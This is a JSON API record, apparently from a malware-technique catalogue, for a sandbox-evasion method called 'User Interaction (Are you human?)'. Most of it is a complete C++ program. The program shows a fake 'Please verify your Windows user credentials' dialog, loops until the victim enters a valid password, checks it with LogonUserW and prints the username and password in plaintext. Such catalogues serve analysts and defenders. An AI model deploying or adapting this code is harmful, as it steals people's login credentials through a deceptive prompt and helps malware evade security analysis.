GET /api/techniques/174/
HTTP 200 OK
Allow: GET, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "name": "User Interaction (Are you human?)",
    "category": [
        "https://search.unprotect.it/api/categories/1/"
    ],
    "description": "You can gain an advantage against sandboxes by using user-interaction techniques. For example, the average user has a username and password; as long as the user you are targeting does not enter their password correctly, you can prevent your malware from executing and bypass the possible sandbox control.",
    "resources": "https://github.com/hlldz/pickl3",
    "tags": "",
    "snippets": [
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/14/",
            "technique": "https://search.unprotect.it/api/techniques/174/",
            "description": "",
            "plain_code": "#include <Windows.h>\r\n#include <tchar.h>\r\n#include <CommCtrl.h>\r\n#include <wincred.h>\r\n#include <iostream>\r\n#include <atlstr.h>\r\n\r\n#pragma comment(lib, \"comctl32.lib\")\r\n#pragma comment(lib, \"Credui.lib\")\r\n\r\nvoid pickl3() {\r\n\r\n\tBOOL loginStatus = FALSE;\r\n\tdo {\r\n\t\tCREDUI_INFOW credui = {};\r\n\t\tcredui.cbSize = sizeof(credui);\r\n\t\tcredui.hwndParent = nullptr;\r\n\t\t//credui.pszMessageText = L\"...\";\r\n\t\tcredui.pszCaptionText = L\"Please verify your Windows user credentials to proceed.\";\r\n\t\tcredui.hbmBanner = nullptr;\r\n\r\n\t\tULONG authPackage = 0;\r\n\t\tLPVOID outCredBuffer = nullptr;\r\n\t\tULONG outCredSize = 0;\r\n\t\tBOOL save = false;\r\n\t\tDWORD err = 0;\r\n\r\n\t\terr = CredUIPromptForWindowsCredentialsW(&credui, err, &authPackage, nullptr, 0, &outCredBuffer, &outCredSize, &save, CREDUIWIN_ENUMERATE_CURRENT_USER);\r\n\t\tif (err == ERROR_SUCCESS) {\r\n\t\t\tWCHAR pszUName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR pszPwd[CREDUI_MAX_PASSWORD_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tDWORD maxLenName = CREDUI_MAX_USERNAME_LENGTH + 1;\r\n\t\t\tDWORD maxLenPassword = CREDUI_MAX_PASSWORD_LENGTH + 1;\r\n\t\t\tDWORD maxLenDomain = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;\r\n\t\t\tCredUnPackAuthenticationBufferW(CRED_PACK_PROTECTED_CREDENTIALS, outCredBuffer, outCredSize, pszUName, &maxLenName, domain, &maxLenDomain, pszPwd, &maxLenPassword);\r\n\r\n\t\t\tWCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tCredUIParseUserNameW(pszUName, parsedUserName, CREDUI_MAX_USERNAME_LENGTH + 1, parsedDomain, CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1);\r\n\r\n\t\t\tHANDLE handle = nullptr;\r\n\t\t\tloginStatus = LogonUserW(parsedUserName, parsedDomain, pszPwd, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, 
&handle);\r\n\r\n\r\n\t\t\tif (loginStatus == TRUE) {\r\n\t\t\t\tCloseHandle(handle);\r\n\t\t\t\tstd::wcout << \"\\n[+] Valid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tstd::wcout << \"\\n[-] Invalid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tloginStatus = FALSE;\r\n\t\t\t}\r\n\t\t}\r\n\t} while (loginStatus == FALSE);\r\n}\r\n\r\n\r\n\r\nint main () {\r\n\t\r\n\tpickl3();\r\n\treturn 0;\r\n}"
        }
    ],
    "detection_rules": []
}